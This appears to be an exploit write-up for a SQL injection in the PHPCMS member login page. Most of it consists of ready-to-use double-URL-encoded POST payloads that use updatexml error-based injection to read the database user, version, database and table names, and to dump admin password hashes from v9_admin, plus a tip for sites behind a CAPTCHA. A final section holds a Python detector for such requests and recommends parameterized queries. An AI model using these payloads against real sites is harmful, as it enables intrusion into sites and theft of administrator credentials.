index.php?m=member&c=index&a=login (URL suffix)

username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2buser())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523 (dump the admin account password)

Version: username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bversion())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523

Database: username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bdatabases())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523

Dump table names: updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema='phpcms' limit 0,1),0x5e24),1)

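Just URL-encode it and substitute it into the payload.

updatexml must take exactly three values,

so accounts and passwords have to be extracted one at a time.

For example: updatexml(1,concat(0x5e24,(select password from v9_admin limit 0,1),0x5e24),1)

And so on.

Note (for sites that require a CAPTCHA to log in, append &code=5fnuv&dosubmit=%E7%99%BB%E5%BD%95)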
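
A defender-side check for the request shape above, added here as an example (not code from the original post): the injected data sits in the password field behind extra layers of URL encoding and hides a second username parameter plus SQL such as updatexml. The function names and the two sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# SQL fragments that appear in the payloads on this page ('+' may stand in for a space).
SQLI_MARKERS = re.compile(r"updatexml\s*\(|union[\s+]+select|information_schema", re.I)
MAX_ROUNDS = 5  # bound on extra decode passes

def fully_decode(value):
    """Percent-decode until the value stops changing; return (text, extra_rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def inspect_login_body(body):
    """Return {field: [reasons]} for suspicious fields in a urlencoded POST body."""
    pairs = parse_qsl(body, keep_blank_values=True)  # performs the first decode
    names = {name for name, _ in pairs}
    findings = {}
    for name, value in pairs:
        text, rounds = fully_decode(value)
        reasons = []
        # A form field name reappearing inside another field's value means a
        # second parameter was hidden behind extra encoding layers.
        for other in sorted(names):
            if re.search(r"&" + re.escape(other) + r"=", text):
                reasons.append(f"embedded parameter '{other}' ({rounds} extra decode round(s))")
        if SQLI_MARKERS.search(text):
            reasons.append("SQL injection marker")
        if reasons:
            findings[name] = reasons
    return findings

# Constructed samples: shortened bodies with the same encoding shape, not captured traffic.
SUSPICIOUS = ("username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect"
              "%2bupdatexml(1%252c2%252c3)%2523")
BENIGN = "username=phpcms&password=P%40ss%2Bword%25&dosubmit=1"

if __name__ == "__main__":
    for body in (SUSPICIOUS, BENIGN):
        print(inspect_login_body(body))
```

The embedded-parameter test is a heuristic for log review or a WAF rule; the underlying fix is to stop decoding and re-parsing request values after input filtering has already run, and to use parameterized queries.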
